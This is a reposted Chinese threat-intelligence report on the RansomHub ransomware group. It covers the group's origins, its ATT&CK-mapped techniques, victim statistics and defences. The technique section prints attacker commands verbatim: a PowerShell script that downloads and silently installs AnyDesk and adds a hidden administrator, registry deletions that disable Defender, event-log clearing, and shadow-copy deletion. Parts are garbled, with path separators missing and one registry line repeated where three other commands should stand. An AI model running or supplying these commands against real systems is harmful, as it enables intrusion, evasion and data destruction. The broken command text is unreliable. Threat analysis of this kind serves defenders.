【文章转载】勒索病毒聚焦：RansomHub的崛起与防御策略

RansomHub勒索病毒团伙（也被称为Water Bakunawa）通过主要由俄罗斯网络犯罪分子组成的暗网论坛RAMP招募加盟者。该勒索病毒团伙使用用GoLang编写的勒索病毒变种来攻击Windows和Linux系统，并使用C++编写针对ESXi服务器的勒索病毒。该团伙遵守严格的规则：他们不攻击非营利组织，不会再次攻击已经支付赎金的受害者，避免攻击独立国家联合体（CIS）成员国、古巴、朝鲜和中国。

RansomHub已被观察到承诺，在加盟者在支付后没有提供解密器或误攻击了禁区组织时，免费发送解密器。加盟者保留90%的赎金，剩余10%归主团伙所有。

RansomHub与Knight勒索软件组织（也称为Cyclops勒索软件）之间也存在显著相似之处。RansomHub的RaaS管理面板在设计和功能上与Knight的RaaS面板类似。Cyclops被认为是Knight RaaS计划的运营者，并曾在2024年2月18日通过RAMP网络犯罪论坛出售Knight 3.0勒索病毒的源代码。该提议包括了管理面板和勒索病毒的源代码，均使用C++和GoLang编写，这也是RansomHub勒索病毒所使用的编程语言。

有趣的是，在2024年2月12日，即源代码出售之前几天，Knight RaaS基于Tor的受害者曝光博客变得无法访问，并在写作时仍无法访问。与此同时，RansomHub RaaS在同一时段启动。这些关联表明，RansomHub勒索病毒可能是Knight勒索软件组织的继任者或替代者。

初始访问

RansomHub勒索病毒团伙使用定向钓鱼语音诈骗作为初始访问手段。网络犯罪分子通过社会工程学手段操纵受害者账户密码重置，利用带有可信美国口音的发言人诱导受害者。此外，RansomHub可能还利用被盗的VPN账户进行攻击。

执行

RansomHub背后的操作者使用PsExec在受害者的机器上远程执行命令。还观察到他们使用PowerShell脚本执行与凭证访问相关的命令，发现远程系统，并建立SSH连接。

此外，他们还使用Python脚本建立SSH连接，通过安全文件传输协议（SFTP）传输加密程序，并同时在多个服务器上执行加密程序。

持久性

RansomHub使用本地账户维持访问权限，并将创建的用户添加到管理员组，以维持提升的访问权限。

防御规避

RansomHub会释放并执行一个名为disableAV.bat的批处理文件，该文件被检测为Trojan.BAT.KAPROCHANDLER.A。该批处理文件会复制并执行用于终止和删除与防病毒相关的进程和文件的二进制文件。该二进制文件被检测为STONESTOP，利用一个签名驱动程序（被检测为POORTRY）删除与防病毒产品相关的文件并终止相关进程。

此外，勒索病毒还使用另一个批处理文件删除多个注册表子键和条目，以绕过Windows中的病毒和威胁防护设置。

RansomHub还使用TDSSKiller禁用目标系统中的防病毒或EDR解决方案，并使用TOGGLEDEFENDER禁用Windows Defender。

该勒索病毒团伙还使用EDR Kill Shifter，这是一种加载器可执行文件，利用了“自带漏洞驱动程序（BYOVD）”技术。它利用不同的漏洞驱动程序来禁用EDR保护。

另外，勒索病毒团伙还使用IOBit Unlocker解锁被其他进程或程序锁定的文件和文件夹。

凭证访问

RansomHub勒索病毒团伙使用MIMIKATZ、LaZagne和SecretServerSecretStealer等工具来获取受害者机器上的密码和凭证。

该团伙还被发现利用Veeam Backup & Replication组件中的漏洞CVE-2023-27532，连接到TCP/9401端口上的Veeam.Backup.Service.exe，创建网络共享，并执行PowerShell脚本将Veeam数据库中的凭证导出到文本文件中。它们还使用Veeamp工具，这是一个专门用于从Veeam备份管理软件所用的SQL数据库中提取凭证的工具。

此外，RansomHub还对域控制器发起暴力破解攻击，成功后通过NTLMv1协议登录。它们还提取了NTDS.dit文件，这个文件存储了活动目录的数据，包括用户、组、安全描述符和密码哈希。

该团伙还使用PowerShell脚本与CyberArk Privileged Access Security（PAS）解决方案进行交互，从保险箱中提取账户信息，并将数据导出为CSV文件。

发现

RansomHub的操作者使用NetScan工具来发现并获取有关网络设备的信息。他们还使用Advanced Port Scanner扫描网络计算机上的开放端口。

横向移动

RansomHub勒索病毒使用cmd命令xcopy/copy来传输二进制文件和驱动程序，这些文件和驱动程序分别用于终止和删除与防病毒相关的进程和文件。该团伙还通过PowerShell脚本连接到vCenter服务器，检索所有ESXi主机，并配置每台主机上的SSH服务为自动启动，从而允许外部SSH连接。该脚本还具备重置ESXi root用户密码的功能，执行后会断开与vCenter服务器的连接。 RansomHub的操作者还使用了一个SMB传播工具，该工具利用Impacket，且由RansomHub的联盟提供。SMB传播工具会在受影响系统的本地网络上执行指定的勒索病毒可执行文件。 此外，RansomHub还通过SFTP传输加密程序。

命令与控制

RansomHub的操作者使用Atera、Splashtop、AnyDesk、Ngrok、Screen Connect和Remmina等工具远程访问受害者的机器。

影响

RansomHub勒索病毒使用两种加密算法对目标文件进行加密：ECDH和AES。加密后，勒索病毒会将配置文件中的32字节主公钥附加到每个加密文件的末尾。在执行勒索病毒时，二进制文件需要指定一个-pass参数，该参数包含一个32字节的密码短语。这个密码短语用于在运行时解密嵌入的配置文件，配置文件中列出了需要避开的文件扩展名、文件名和文件夹、需要终止的进程和服务，以及被攻破的登录账户。

数据外泄

RansomHub勒索病毒已被发现使用第三方工具和网络服务RClone来外泄窃取的信息。

初始访问

T1078 - 有效账户

勒索病毒团伙可能通过已被妥协的VPN账户进行攻击。

T1566.004 - 钓鱼攻击：语音钓鱼

根据外部报告，勒索病毒团伙利用社会工程学手段，特别是通过具有美国口音的语音，操控受害者重置账户密码。

执行

T1059.001 - 命令和脚本解释器：PowerShell

• 根据外部报告，勒索病毒团伙使用PowerShell脚本执行与凭证访问、发现远程系统以及启用SSH服务相关的命令。
• 勒索病毒团伙还使用PowerShell脚本下载AnyDesk：

Function AnyDesk {
    mkdir "C:ProgramDataAnyDesk" # 创建AnyDesk目录
    
$clnt = new-object System.Net.WebClient 
    $
url = "hxxp://download[.]anydesk[.]com/AnyDesk.exe"
    
$file = "C:ProgramDataAnyDesk.exe" 
    $
clnt.DownloadFile(
$url,$
file)
    cmd.exe /c C:ProgramDataAnyDesk.exe --install C:ProgramDataAnyDesk --start-with-win --silent
    cmd.exe /c echo {redacted} | C:ProgramDataanydesk.exe --set-password
    net user {redacted} "{redacted}" /add
    net localgroup Administrators {redacted} /ADD
    reg add "HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserlist" /v {redacted} /t REG_DWORD /d 0 /f
    cmd.exe /c C:ProgramDataAnyDesk.exe --get-id 
}

T1059.006 - 命令和脚本解释器：Python

根据外部报告，勒索病毒团伙使用自定义Python脚本建立与目标ESXi服务器的SSH连接，通过SFTP传输加密器，确认成功传输，并同时在多个服务器上执行加密器。

T1059.003 - 命令和脚本解释器：Windows命令Shell

勒索病毒二进制文件接受以下参数：

其他版本的RansomHub接受以下命令行参数：

它还可以通过使用-cmd {要执行的命令}参数在加密程序执行之前执行指定的命令。

持久性

T1136.001 - 创建账户：本地账户

勒索病毒团伙能够通过net命令行工具执行命令，创建本地账户，以维持对受害系统的访问。

T1098 - 账户操作

勒索病毒团伙能够通过net命令行工具执行命令，将创建的用户账户添加到管理员组中，以维持更高权限的访问。

T1547.001 - 启动或登录自动启动执行：注册表运行键/启动文件夹

如果传递“-safeboot”参数，勒索病毒二进制文件会将以下条目添加到SOFTWAREMicrosoftWindows NTCurrentVersionRunOnce注册表键中，以便在重启时执行自身：

*zCCyEs = {恶意文件路径}{恶意文件名} -safeboot-instance -pass {32字节密码}

T1547 - 启动或登录自动启动执行

• 勒索病毒二进制文件通过在SOFTWAREMicrosoftWindows NTCurrentVersionWinlogon中添加以下注册表项启用自动登录：

AutoAdminLogon = 1  
DefaultUserName = Administrator  
DefaultDomainName =  
DefaultPassword = {随机字符}  

• 这些凭据随后会保存到名为user.txt的文本文件中，登录信息也会显示在控制台中。

权限提升

T1078.003 - 有效账户：本地账户

如果传递“-safeboot”参数，勒索病毒二进制文件会尝试使用加密配置中凭证键包含的被盗用户名和密码，通过API LogonUserW以管理员身份登录。如果登录尝试失败，它会启用自动登录功能。

T1134.001 - 访问令牌操作：令牌冒充/窃取

勒索病毒二进制文件可以通过调用ImpersonateLoggedOnUser API，冒充已登录用户的安全上下文。

防御规避

T1480 - 执行保护措施

勒索病毒二进制文件在执行时需要通过-pass参数提供一个32字节的密码。如果密码错误，RansomHub样本将无法正常执行，且在控制台显示“bad config”。

T1112 - 修改注册表

根据外部报告，勒索病毒团伙会删除多个注册表项和子项，以绕过Windows中的病毒和威胁防护设置：

reg delete "HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies" /f  
reg delete "HKCUSoftwareMicrosoftWindowsSelfHost" /f  
reg delete "HKCUSoftwarePolicies" /f  
reg delete "HKLMSoftwareMicrosoftPolicies" /f  
reg delete "HKLMSoftwareMicrosoftWindowsCurrentVersionPColicies" /f  
reg delete "HKLMSoftwareMicrosoftWindowsCurrentVersionWindows StoreWindows Update" /f  
reg delete "HKLMSoftwareMicrosoftWindowsSelfHost" /f  
reg delete "HKLMSoftwarePolicies" /f  
reg delete "HKLMSoftwareWOW6432NodeMicrosoftPolicies" /f  
reg delete "HKLMSoftwareWOW6432NodeMicrosoftWindowsCurrentVersionPolicies" /f  
reg delete "HKLMSoftwareWOW6432NodeMicrosoftWindowsCurrentVersionWindows StoreWindows Update" /f

T1027.013 - 混淆文件或信息：加密/编码文件

勒索病毒二进制文件使用加密配置，且在运行时会用命令行执行时提供的32字节密码进行解密。配置中包含可配置设置，如文件扩展名、文件名、避免加密的文件夹等。

T1564.003 - 隐藏痕迹：隐藏窗口

勒索病毒二进制文件通过API ShowWindow隐藏控制台窗口。

T1070.001 - 清除Windows事件日志

通过API CreateProcessW，勒索病毒二进制文件执行以下命令清除Windows事件日志：

cmd.exe /c wevtutil cl security  
cmd.exe /c wevtutil cl system  
cmd.exe /c wevtutil cl application

勒索病毒团伙还使用名为LogDel.bat的批处理文件清除Windows事件日志。已清除的日志列表包含在IoCs中。

T1562.006 - 损害防御：阻止指示符

勒索病毒二进制文件使用API SetErrorMode并传递0x8003参数，以防止系统显示任何错误信息。

T1222.001 - 修改Windows文件和目录权限

执行以下命令以允许远程符号链接指向本地资源：

cmd.exe /c "fsutil behavior set SymlinkEvaluation R2L:1"  
cmd.exe /c "fsutil behavior set SymlinkEvaluation R2R:1"

LogDel.bat 被用来修改 default.rdp 的属性，移除系统和隐藏属性。

attrib Default.rdp -s -h

T1562.009 - 损害防御：安全模式启动

如果传递“-safeboot”参数，勒索病毒二进制文件可以通过API CreateProcessW执行以下命令，将受害者的计算机重启为带网络连接的安全模式：

bcdedit /set {default} safeboot network

凭证访问

T1003 - 操作系统凭证转储

在连接到Veeam.Backup.Service.exe的TCP/9401端口后，勒索病毒团伙使用net命令行工具创建了一个网络共享，并在该共享上创建了一个PowerShell脚本，用于转储来自Veeam数据库的凭证。转储的凭证随后保存到文本文件中。

T1003.003 - 操作系统凭证转储：NTDS

勒索病毒团伙被观察到提取NTDS.dit文件。

T1110 - 暴力破解

勒索病毒团伙对域控制器进行了暴力破解攻击，随后使用ntlmv1登录到域控制器。

T1110.003 - 暴力破解：密码喷洒

勒索病毒团伙使用名为232.bat的批处理文件执行了密码喷洒攻击。

T1003.001 - 操作系统凭证转储：LSASS内存

勒索病毒团伙通过LSASS任务管理器转储执行了凭证转储。

T1555.005 - 从密码存储中获取凭证：密码管理器

根据外部报告，勒索病毒团伙使用PowerShell脚本与CyberArk特权访问安全（PAS）解决方案交互，从保险柜中提取账户信息并将其导出为CSV文件。

发现

T1057 - 进程发现

勒索病毒二进制文件使用API Process32FirstW 和 Process32NextW 搜索其配置文件中列出的需要终止的进程（kill_processes），并将其结束。 点击查看kill_processes列表。

T1082 - 系统信息发现

勒索病毒二进制文件使用API GetLogicalDriveStringsW 枚举所有已挂载的驱动器，并使用 GetDriveTypeW 确定驱动器类型。

T1083 - 文件和目录发现

勒索病毒二进制文件使用API FindFirstFileW 和 FindNextFileW 搜索其将加密的文件和文件夹，并避免白名单中的文件和文件夹。 点击查看白名单文件夹和文件列表。

T1082 - 系统信息发现

勒索病毒二进制文件通过使用 GetProcAddress API 检查是否存在 wine_get_version 函数来尝试确定其是否在WINE环境中运行。

T1087.001 - 账户发现：本地账户

勒索病毒二进制文件使用API NetUserEnum 枚举本地账户。

T1135 - 网络共享发现

勒索病毒二进制文件使用API NetShareEnum 来发现和加密受感染主机上的共享资源。

横向移动

T1570 - 横向工具传输

勒索病毒二进制文件使用 cmd 命令 xcopy/copy 来传输用于终止和删除与防病毒相关的进程和文件的二进制文件和驱动程序。

T1021.004 - 远程服务：SSH

根据外部报告，勒索病毒团伙使用PowerShell脚本连接到vCenter Server，检索所有ESXi主机，并配置每个主机上的SSH服务为自动启动，从而启用外部SSH连接。该脚本还具有重置ESXi root用户密码的功能，并在完成后断开与vCenter Server的连接。

命令与控制

T1105 - 外部工具传输

根据外部报告，勒索病毒团伙使用SFTP传输加密程序。

影响

T1486 - 数据加密以造成影响

该勒索病毒避免加密以下文件扩展名的文件：

• *.deskthemepack
• *.themepack
• *.theme
• *.msstyles
• *.exe
• *.drv
• *.msc
• *.dll
• *.lock
• *.sys
• *.msu
• *.lnk
• *.ps1
• *.iso
• *.inf
• *.cab
• *.386

它避免加密文件名中包含以下字符串的文件：

• NTUSER.DAT

• autorun.inf

• boot.ini

• desktop.ini

• thumbs.db

它避免加密在以下白名单文件夹中找到的文件。 它将主公钥的前六个字符附加为文件扩展名到加密文件的末尾。 它清空受影响机器的回收站。 它在加密的文件夹中放置以下勒索信： {Encrypted directory}README_{主公钥前六个字符}.txt

它使用两种加密算法对目标文件进行加密，分别为ECDH和AES。勒索病毒然后将32字节的主公钥从其配置中附加到每个加密文件的末尾。它具有一个内嵌配置文件，在运行时解密，配置文件中包含要避免的文件扩展名、文件名和文件夹。

T1490 - 禁用系统恢复

勒索病毒二进制文件执行以下命令删除阴影副本：

powershell.exe -Command Powershell -Command ""Get-CimInstance Win32_ShadowCopy | Remove-CimInstance""

T1489 - 停止服务

勒索病毒二进制文件执行以下命令以停止运行在Hyper-V主机上的所有虚拟机：

powershell.exe -Command PowerShell -Command ""Get-VM | Stop-VM -Force""

勒索病毒二进制文件还通过以下命令停止所有IIS服务：

*zCCyEs = {恶意文件路径}{恶意文件名} -safeboot-instance -pass {32字节密码}
0

勒索病毒二进制文件使用API ControlService，dwControl设置为1（SERVICE_CONTROL_STOP）终止其配置中包含的服务。

T1529 - 系统关机/重启

如果传递了-safeboot参数，勒索病毒二进制文件会发出以下命令来重启系统：

*zCCyEs = {恶意文件路径}{恶意文件名} -safeboot-instance -pass {32字节密码}
1

数据外泄

T1567.002 - 向云存储外泄

该勒索病毒团伙使用 RClone 工具，通过以下命令将文件外泄：

*zCCyEs = {恶意文件路径}{恶意文件名} -safeboot-instance -pass {32字节密码}
2

安全团队应关注以下恶意软件工具和漏洞利用，这些通常在 LockBit 攻击中被使用：

在本节中，我们概述了RansomHub勒索病毒和Knight勒索病毒的活动，调查表明这两者之间可能存在关联。RansomHub首次报告发生在2024年2月，但在Trend Micro监控的系统中首次尝试攻击发生在2024年4月。另一方面，Knight勒索病毒自今年1月起活跃，我们的遥测数据从那时开始进行跟踪。

Knight勒索病毒主要攻击的国家包括巴西、美国、土耳其、爱尔兰和以色列，而RansomHub则主要针对美国和马来西亚的企业。

尽管许多客户选择不指定所属行业，但根据提供行业信息的客户数据，Knight勒索病毒主要攻击金融机构，而RansomHub勒索病毒则主要针对教育行业。

本节基于RansomHub勒索病毒泄露网站上记录的攻击数据，以及我们从2023年7月至2024年9月的开源情报（OSINT）研究和调查结果。（注：图片来源均为RansomHub勒索病毒泄露网站和Trend Micro的开源情报研究（2023年7月 - 2024年9月））

截至目前，RansomHub勒索病毒已将至少338个受害者列入其泄露网站，但实际受害者数量可能更高。

在已披露的受害者中，RansomHub勒索病毒最常攻击北美地区的企业。

RansomHub最主要的攻击目标是美国的企业。虽然该团伙对其他国家的攻击次数较少，但其总受害者数达到338个，且这些受害者来自至少58个国家。

大多数RansomHub勒索病毒的受害组织是小型企业。该团伙共针对中型企业进行了65次攻击，而大型企业则只有38次。

RansomHub并没有特别偏好的行业目标，因为其受害者分布广泛，涉及多个行业。然而，泄露网站显示，攻击次数最多的行业是IT行业。

审计与资产清单

• 清点资产和数据
• 识别授权和未授权的设备及软件
• 审核事件和事故日志

配置与监控

• 管理硬件和软件配置
• 仅在员工角色需要时授予管理员权限和访问权限
• 监控网络端口、协议和服务
• 在网络基础设施设备（如防火墙和路由器）上启用安全配置
• 建立软件白名单，仅允许执行经过验证的合法应用程序

补丁与更新

• 定期进行漏洞评估
• 为操作系统和应用程序进行打补丁或虚拟补丁
• 更新软件和应用程序至最新版本

保护与恢复

• 实施数据保护、备份和恢复措施
• 启用多因素身份验证（MFA）

安全与防御

• 使用沙箱分析技术阻止恶意邮件
• 在所有层级（包括电子邮件、端点、Web和网络）部署最新版本的安全解决方案
• 及时发现攻击迹象，如系统中出现可疑工具
• 使用基于人工智能和机器学习的高级检测技术

培训与测试

• 定期培训和评估员工的安全技能
• 进行红队演习和渗透测试

https://www.trendmicro.com/vinfo/gb/security/news/ransomware-spotlight/ransomware-spotlight-ransomhub

喜欢此内容的人还喜欢